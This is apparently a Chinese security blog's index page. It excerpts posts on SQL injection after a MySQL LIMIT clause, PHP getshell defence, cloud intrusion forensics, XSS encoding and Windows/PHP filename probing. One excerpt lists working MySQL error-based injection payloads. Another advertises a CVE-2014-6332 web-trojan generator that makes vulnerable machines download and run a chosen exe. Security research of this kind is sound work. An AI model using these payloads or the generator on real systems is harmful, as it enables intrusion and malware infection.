security

Mysql注入点在limit关键字后面的利用方法

在一次测试中,我碰到了一个sql注入的问题,在网上没有搜到解决办法,当时的注入点是在limit关键字后面,数据库是MySQL5.x,SQL语句类似下面这样:

1
SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 【注入点】

问题的关键在于,语句中有order by 关键字,我们知道,mysql 中在order by 前面可以使用union 关键字,所以如果注入点前面没有order by 关键字,就可以顺利的使用union 关键字,但是现在的情况是,注入点前面有order by 关键字,这个问题在stackoverflow 上和sla.ckers上都有讨论,但是都没有什么有效的解决办法。
我们先看看 mysql 5.x 的文档中的 select 的语法:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
SELECT
    [ALL | DISTINCT | DISTINCTROW ]
      [HIGH_PRIORITY]
      [STRAIGHT_JOIN]
      [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
      [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
    select_expr [, select_expr ...]
    [FROM table_references
    [WHERE where_condition]
    [GROUP BY {col_name | expr | position}
      [ASC | DESC], ... [WITH ROLLUP]]
    [HAVING where_condition]
    [ORDER BY {col_name | expr | position}
      [ASC | DESC], ...]
    [LIMIT {[offset,] row_count | row_count OFFSET offset}]
    [PROCEDURE procedure_name(argument_list)]
    [INTO OUTFILE 'file_name' export_options
      | INTO DUMPFILE 'file_name'
      | INTO var_name [, var_name]]
    [FOR UPDATE | LOCK IN SHARE MODE]]

阅读更多

TSRC挑战赛: PHP场景中getshell防御思路分享

博文作者:pandas
发布日期:2014-07-23

1    背景概述

WEB应用漏洞导致的入侵时有发生,扫描器和WAF并不能解决所有的问题,于是尝试在主机侧针对PHP环境做了一个防御方案。很荣幸的邀请到TSRC部分白帽子做了一次对抗演习,本文主要分享一下防御思路。

防御方案主要想解决的问题是getshell、主机敏感文件泄漏等问题。于是乎出了下面这样一个题目:部署了防御方案的Nginx + PHP 的WEB环境,提供一个上传入口,可上传任意文件。找到WEB目录下的一个flag文件读取到内容即算突破。

阅读更多

云端博弈——云安全入侵取证及思考

云计算平台是目前比较火的产业,腾讯也有面向企业和个人的公有云平台——腾讯云。笔者所在的腾讯安全中心也负责腾讯云的部分安全职责,因为工作关系,笔者也经常处理腾讯云上的安全事件。本文通过对腾讯云上的一次入侵取证分析实际案例,以小见大来窥探云计算平台(特别是公有云)的安全建设思路,希望对大家有帮助。

某次接到系统报警某商户主机出现可疑文件,需配合调查。通过后台数据很快确认了问题,并结合其他取证手段捋清了整个事件。现已对腾讯云商户发布了安全预警。整个事件在技术对抗上并无可圈可点之处,但通过此类事件,发现我们不少云安全工作的问题,值得反思。

阅读更多

SQL error-based injection

GeometryCollection()
linestring()
multipoint()
multilinestring()
multipolygon()
polygon()
name_const()

1
2
-> SELECT GeometryCollection((select*from(select*from(select@@version)f)x));
-> SELECT polygon((select*from(select name_const(version(),1))x));

来源:http://zone.wooyun.org/content/16646

1
select!x-~0.FROM(select+user()x)f;

来源:https://rdot.org/forum/showthread.php?t=3167

CVE-2014-6332 网页木马生成器

传送门:
http://www.phpbug.cn/tools/CVE-2014-6332/maker.php

受影响系统:
Microsoft Windows Windows Vista SP2
Microsoft Windows Vista SP2
Microsoft Windows Server 2012 R2
Microsoft Windows Server 2008 SP2
Microsoft Windows Server 2003 SP2
Microsoft Windows RT 8.1
Microsoft Windows RT
Microsoft Windows 8.1
Microsoft Windows 8
描述:
BUGTRAQ ID: 70952
CVE(CAN) ID: CVE-2014-6332

生成器使用了袁哥提供的样本,结合vbs下载者简单加密而成,不喜勿喷。
使用方法:
填入exe木马的下载地址。存在漏洞的机器访问生成器生成的页面后会下载并执行exe木马。

XSS编码剖析

0×00 引言
很多不了解html、js编码的童鞋挖掘xss漏洞时,都是一顿乱插,姿势对了,就能获得快感,姿势不对,就么反应。另外在freebuf里,有很多文章介绍过跨站编码,有兴趣的,可以搜索下。
本文介绍常见的编码方法,能力不足,如有其他意见,请指正。

阅读更多

当Windows遇上PHP–路径爆破

1.开场白

此次所披露的是以下网页中提出的问题所取得的测试结果:

http://code.google.com/p/pasc2at/wiki/SimplifiedChinese

1
2
3
4
5
6
7
<?php
for ($i=0; $i<255; $i++) {
$url = '1.ph' . chr($i);
$tmp = @file_get_contents($url);
if (!empty($tmp)) echo chr($i) . "\r\n";
}
?>

已知1.php存在,以上脚本访问的结果是:

1.php
1.phP
1.ph< 1.ph>

阅读更多